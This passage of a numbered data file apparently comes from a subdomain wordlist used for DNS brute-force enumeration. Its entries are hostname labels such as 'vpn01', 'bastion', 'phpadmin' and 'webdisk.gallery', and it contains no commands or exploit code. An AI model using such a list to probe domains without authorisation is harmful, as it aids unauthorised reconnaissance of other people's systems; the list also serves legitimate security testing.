4171 | pas
4172 | www.v3
4173 | storage1
4174 | rs1
4175 | sakai
4176 | pim
4177 | vcse
4178 | ko
4179 | oem
4180 | theme
4181 | tumblr
4182 | smtp0
4183 | server14
4184 | lala
4185 | storage2
4186 | k2
4187 | ecm
4188 | moo
4189 | can
4190 | imode
4191 | webdisk.gallery
4192 | webdisk.jobs
4193 | howard
4194 | mes
4195 | eservices
4196 | noah
4197 | support1
4198 | soc
4199 | gamer
4200 | ekb
4201 | marco
4202 | information
4203 | heaven
4204 | ty
4205 | kursk
4206 | wilson
4207 | webdisk.wp
4208 | freebsd
4209 | phones
4210 | void
4211 | esx3
4212 | empleo
4213 | aida
4214 | s01
4215 | apc1
4216 | mysites
4217 | www.kazan
4218 | calc
4219 | barney
4220 | prohome
4221 | fd
4222 | kenny
4223 | www.filme
4224 | ebill
4225 | d6
4226 | era
4227 | big
4228 | goodluck
4229 | rdns2
4230 | everything
4231 | ns43
4232 | monty
4233 | bib
4234 | clip
4235 | alf
4236 | quran
4237 | aim
4238 | logon
4239 | wg
4240 | rabbit
4241 | ntp3
4242 | upc
4243 | www.stream
4244 | www.ogloszenia
4245 | abcd
4246 | autodiscover.en
4247 | blogger
4248 | pepper
4249 | autoconfig.en
4250 | stat1
4251 | jf
4252 | smtp7
4253 | video3
4254 | eposta
4255 | cache1
4256 | ekaterinburg
4257 | talent
4258 | jewelry
4259 | ecs
4260 | beta3
4261 | www.proxy
4262 | zsb
4263 | 44
4264 | ww6
4265 | nautilus
4266 | angels
4267 | servicos
4268 | smpp
4269 | we
4270 | siga
4271 | magnolia
4272 | smt
4273 | maverick
4274 | franchise
4275 | dev.m
4276 | webdisk.info
4277 | penza
4278 | shrek
4279 | faraday
4280 | s123
4281 | aleph
4282 | vnc
4283 | chinese
4284 | glpi
4285 | unix
4286 | leto
4287 | win10
4288 | answers
4289 | att
4290 | webtools
4291 | sunset
4292 | extranet2
4293 | kirk
4294 | mitsubishi
4295 | ppp
4296 | cargo
4297 | comercial
4298 | balancer
4299 | aire
4300 | karma
4301 | emergency
4302 | zy
4303 | dtc
4304 | asb
4305 | win8
4306 | walker
4307 | cougar
4308 | autodiscover.videos
4309 | bugtracker
4310 | autoconfig.videos
4311 | icm
4312 | tap
4313 | nuevo
4314 | ganymede
4315 | cell
4316 | www02
4317 | ticketing
4318 | nature
4319 | brazil
4320 | www.alex
4321 | troy
4322 | avatars
4323 | aspire
4324 | custom
4325 | www.mm
4326 | ebiz
4327 | www.twitter
4328 | kong
4329 | beagle
4330 | chess
4331 | ilias
4332 | codex
4333 | camel
4334 | crc
4335 | microsite
4336 | mlm
4337 | autoconfig.crm
4338 | o2
4339 | human
4340 | ken
4341 | sonicwall
4342 | biznes
4343 | pec
4344 | flow
4345 | autoreply
4346 | tips
4347 | little
4348 | autodiscover.crm
4349 | hardcore
4350 | egypt
4351 | ryan
4352 | doska
4353 | mumble
4354 | s34
4355 | pds
4356 | platon
4357 | demo8
4358 | total
4359 | ug
4360 | das
4361 | gx
4362 | just
4363 | tec
4364 | archiv
4365 | ul
4366 | craft
4367 | franklin
4368 | speedtest1
4369 | rep
4370 | supplier
4371 | crime
4372 | mail-relay
4373 | luigi
4374 | saruman
4375 | defiant
4376 | rome
4377 | tempo
4378 | sr2
4379 | tempest
4380 | azure
4381 | horse
4382 | pliki
4383 | barracuda2
4384 | www.gis
4385 | cuba
4386 | adslnat-curridabat-128
4387 | aw
4388 | test13
4389 | box1
4390 | aaaa
4391 | x2
4392 | exchbhlan3
4393 | sv6
4394 | disk
4395 | enquete
4396 | eta
4397 | vm4
4398 | deep
4399 | mx12
4400 | s111
4401 | budget
4402 | arizona
4403 | autodiscover.media
4404 | ya
4405 | webmin
4406 | fisto
4407 | orbit
4408 | bean
4409 | mail07
4410 | autoconfig.media
4411 | berry
4412 | jg
4413 | www.money
4414 | store1
4415 | sydney
4416 | kraken
4417 | author
4418 | diablo
4419 | wwwww
4420 | word
4421 | www.gmail
4422 | www.tienda
4423 | samp
4424 | golden
4425 | travian
4426 | www.cat
4427 | www.biz
4428 | 54
4429 | demo10
4430 | bambi
4431 | ivanovo
4432 | big5
4433 | egitim
4434 | he
4435 | unregistered.zmc
4436 | amanda
4437 | orchid
4438 | kit
4439 | rmr1
4440 | richard
4441 | offer
4442 | edge1
4443 | germany
4444 | tristan
4445 | seguro
4446 | kyc
4447 | maths
4448 | columbia
4449 | steven
4450 | wings
4451 | www.sg
4452 | ns38
4453 | grand
4454 | tver
4455 | natasha
4456 | r3
4457 | www.tour
4458 | pdns
4459 | m11
4460 | dweb
4461 | nurse
4462 | dsp
4463 | www.market
4464 | meme
4465 | www.food
4466 | moda
4467 | ns44
4468 | mps
4469 | jgdw
4470 | m.stage
4471 | bdsm
4472 | mech
4473 | rosa
4474 | sx
4475 | tardis
4476 | domreg
4477 | eugene
4478 | home2
4479 | vpn01
4480 | scott
4481 | excel
4482 | lyncdiscoverinternal
4483 | ncs
4484 | pagos
4485 | recovery
4486 | bastion
4487 | wwwx
4488 | spectre
4489 | static.origin
4490 | quizadmin
4491 | www.abc
4492 | ulyanovsk
4493 | test-www
4494 | deneb
4495 | www.learn
4496 | nagano
4497 | bronx
4498 | ils
4499 | mother
4500 | defender
4501 | stavropol
4502 | g3
4503 | lol
4504 | nf
4505 | caldera
4506 | cfd185
4507 | tommy
4508 | think
4509 | thebest
4510 | girls
4511 | consulting
4512 | owl
4513 | newsroom
4514 | us.m
4515 | hpc
4516 | ss1
4517 | dist
4518 | valentine
4519 | 9
4520 | pumpkin
4521 | queens
4522 | watchdog
4523 | serv1
4524 | web07
4525 | pmo
4526 | gsm
4527 | spam1
4528 | geoip
4529 | test03
4530 | ftp.forum
4531 | server19
4532 | www.update
4533 | tac
4534 | vlad
4535 | saprouter
4536 | lions
4537 | lider
4538 | zion
4539 | c6
4540 | palm
4541 | ukr
4542 | amsterdam
4543 | html5
4544 | wd
4545 | estadisticas
4546 | blast
4547 | phys
4548 | rsm
4549 | 70
4550 | vvv
4551 | kris
4552 | agro
4553 | msn-smtp-out
4554 | labor
4555 | universal
4556 | gapps
4557 | futbol
4558 | baltimore
4559 | wt
4560 | avto
4561 | workshop
4562 | www.ufa
4563 | boom
4564 | autodiscover.jobs
4565 | unknown
4566 | alliance
4567 | www.svn
4568 | duke
4569 | kita
4570 | tic
4571 | killer
4572 | ip176-194
4573 | millenium
4574 | garfield
4575 | assets2
4576 | auctions
4577 | point
4578 | russian
4579 | suzuki
4580 | clinic
4581 | lyncedge
4582 | www.tr
4583 | la2
4584 | oldwebmail
4585 | shipping
4586 | informatica
4587 | age
4588 | gfx
4589 | ipsec
4590 | lina
4591 | autoconfig.jobs
4592 | zoo
4593 | splunk
4594 | sy
4595 | urban
4596 | fornax
4597 | www.dating
4598 | clock
4599 | balder
4600 | steam
4601 | ut
4602 | zz
4603 | washington
4604 | lightning
4605 | fiona
4606 | im2
4607 | enigma
4608 | fdc
4609 | zx
4610 | sami
4611 | eg
4612 | cyclone
4613 | acacia
4614 | yb
4615 | nps
4616 | update2
4617 | loco
4618 | discuss
4619 | s50
4620 | kurgan
4621 | smith
4622 | plant
4623 | lux
4624 | www.kino
4625 | www.extranet
4626 | gas
4627 | psychologie
4628 | 01
4629 | s02
4630 | cy
4631 | modem
4632 | station
4633 | www.reg
4634 | zip
4635 | boa
4636 | www.co
4637 | mx04
4638 | openerp
4639 | bounces
4640 | dodge
4641 | paula
4642 | meetings
4643 | firmy
4644 | web26
4645 | xz
4646 | utm
4647 | s40
4648 | panorama
4649 | photon
4650 | vas
4651 | war
4652 | marte
4653 | gateway2
4654 | tss
4655 | anton
4656 | hirlevel
4657 | winner
4658 | fbapps
4659 | vologda
4660 | arcadia
4661 | www.cc
4662 | util
4663 | 16
4664 | tyumen
4665 | desire
4666 | perl
4667 | princess
4668 | papa
4669 | like
4670 | matt
4671 | sgs
4672 | datacenter
4673 | atlantic
4674 | maine
4675 | tech1
4676 | ias
4677 | vintage
4678 | linux1
4679 | gzs
4680 | cip
4681 | keith
4682 | carpediem
4683 | serv2
4684 | dreams
4685 | front1
4686 | lyncaccess
4687 | fh
4688 | mailer2
4689 | www.chem
4690 | natural
4691 | student2
4692 | sailing
4693 | radio1
4694 | models
4695 | evo
4696 | tcm
4697 | bike
4698 | bancuri
4699 | baseball
4700 | manuals
4701 | img8
4702 | imap1
4703 | oldweb
4704 | smtpgw
4705 | pulsar
4706 | reader
4707 | will
4708 | stream3
4709 | oliver
4710 | mail15
4711 | lulu
4712 | dyn
4713 | bandwidth
4714 | messaging
4715 | us1
4716 | ibm
4717 | idaho
4718 | camping
4719 | verify
4720 | seg
4721 | vs1
4722 | autodiscover.sms
4723 | blade1
4724 | blade2
4725 | leda
4726 | mail17
4727 | horo
4728 | testdrive
4729 | diet
4730 | www.start
4731 | mp1
4732 | claims
4733 | te
4734 | gcc
4735 | www.whois
4736 | nieuwsbrief
4737 | xeon
4738 | eternity
4739 | greetings
4740 | data2
4741 | asf
4742 | autoconfig.sms
4743 | kemerovo
4744 | olga
4745 | haha
4746 | ecc
4747 | prestashop
4748 | rps
4749 | img0
4750 | olimp
4751 | biotech
4752 | qa1
4753 | swan
4754 | bsd
4755 | webdisk.sandbox
4756 | sanantonio
4757 | dental
4758 | www.acc
4759 | zmail
4760 | statics
4761 | ns102
4762 | 39
4763 | idb
4764 | h5
4765 | connect2
4766 | jd
4767 | christian
4768 | luxury
4769 | ten
4770 | bbtest
4771 | blogtest
4772 | self
4773 | www.green
4774 | forumtest
4775 | olive
4776 | www.lab
4777 | ns63
4778 | freebies
4779 | ns64
4780 | www.g
4781 | jake
4782 | www.plus
4783 | ejournal
4784 | letter
4785 | works
4786 | peach
4787 | spoon
4788 | sie
4789 | lx
4790 | aol
4791 | baobab
4792 | tv2
4793 | edge2
4794 | sign
4795 | webdisk.help
4796 | www.mobi
4797 | php5
4798 | webdata
4799 | award
4800 | gf
4801 | rg
4802 | lily
4803 | ricky
4804 | pico
4805 | nod32
4806 | opus
4807 | sandiego
4808 | emploi
4809 | sfa
4810 | application
4811 | comment
4812 | autodiscover.search
4813 | www.se
4814 | recherche
4815 | africa
4816 | webdisk.members
4817 | multi
4818 | wood
4819 | xx
4820 | fan
4821 | reverse
4822 | missouri
4823 | zinc
4824 | brutus
4825 | lolo
4826 | imap2
4827 | www.windows
4828 | aaron
4829 | webdisk.wordpress
4830 | create
4831 | bis
4832 | aps
4833 | xp
4834 | outlet
4835 | www.cpanel
4836 | bloom
4837 | 6
4838 | ni
4839 | www.vestibular
4840 | webdisk.billing
4841 | roman
4842 | myshop
4843 | joyce
4844 | qb
4845 | walter
4846 | www.hr
4847 | fisher
4848 | daily
4849 | webdisk.files
4850 | michelle
4851 | musik
4852 | sic
4853 | taiwan
4854 | jewel
4855 | inbound
4856 | trio
4857 | mts
4858 | dog
4859 | mustang
4860 | specials
4861 | www.forms
4862 | crew
4863 | tes
4864 | www.med
4865 | elib
4866 | testes
4867 | richmond
4868 | autodiscover.travel
4869 | mccoy
4870 | aquila
4871 | www.saratov
4872 | bts
4873 | hornet
4874 | election
4875 | test22
4876 | kaliningrad
4877 | listes
4878 | tx
4879 | webdisk.travel
4880 | onepiece
4881 | bryan
4882 | saas
4883 | opel
4884 | florence
4885 | blacklist
4886 | skin
4887 | workspace
4888 | theta
4889 | notebook
4890 | freddy
4891 | elmo
4892 | www.webdesign
4893 | autoconfig.travel
4894 | sql3
4895 | faith
4896 | cody
4897 | nuke
4898 | memphis
4899 | chrome
4900 | douglas
4901 | www24
4902 | autoconfig.search
4903 | www.analytics
4904 | forge
4905 | gloria
4906 | harry
4907 | birmingham
4908 | zebra
4909 | www.123
4910 | laguna
4911 | lamour
4912 | igor
4913 | brs
4914 | polar
4915 | lancaster
4916 | webdisk.portal
4917 | autoconfig.img
4918 | autodiscover.img
4919 | other
4920 | www19
4921 | srs
4922 | gala
4923 | crown
4924 | v5
4925 | fbl
4926 | sherlock
4927 | remedy
4928 | gw-ndh
4929 | mushroom
4930 | mysql8
4931 | sv5
4932 | csp
4933 | marathon
4934 | kent
4935 | critical
4936 | dls
4937 | capricorn
4938 | standby
4939 | test15
4940 | www.portfolio
4941 | savannah
4942 | img13
4943 | veritas
4944 | move
4945 | rating
4946 | sound
4947 | zephyr
4948 | download1
4949 | www.ticket
4950 | exchange-imap.its
4951 | b5
4952 | andrea
4953 | dds
4954 | epm
4955 | banana
4956 | smartphone
4957 | nicolas
4958 | phpadmin
4959 | www.subscribe
4960 | prototype
4961 | experts
4962 | mgk
4963 | newforum
4964 | result
4965 | www.prueba
4966 | cbf2
4967 | s114
4968 | spp
4969 | trident
4970 | mirror2
4971 | s112
4972 | sonia
4973 | nnov
4974 | www.china
4975 | alabama
4976 | photogallery
4977 | blackjack
4978 | lex
4979 | hathor
4980 | inc
4981 | xmas
4982 | tulip
4983 | and
4984 | common-sw1
4985 | betty
4986 | vo
4987 | www.msk
4988 | pc2
4989 | schools
4990 | 


--------------------------------------------------------------------------------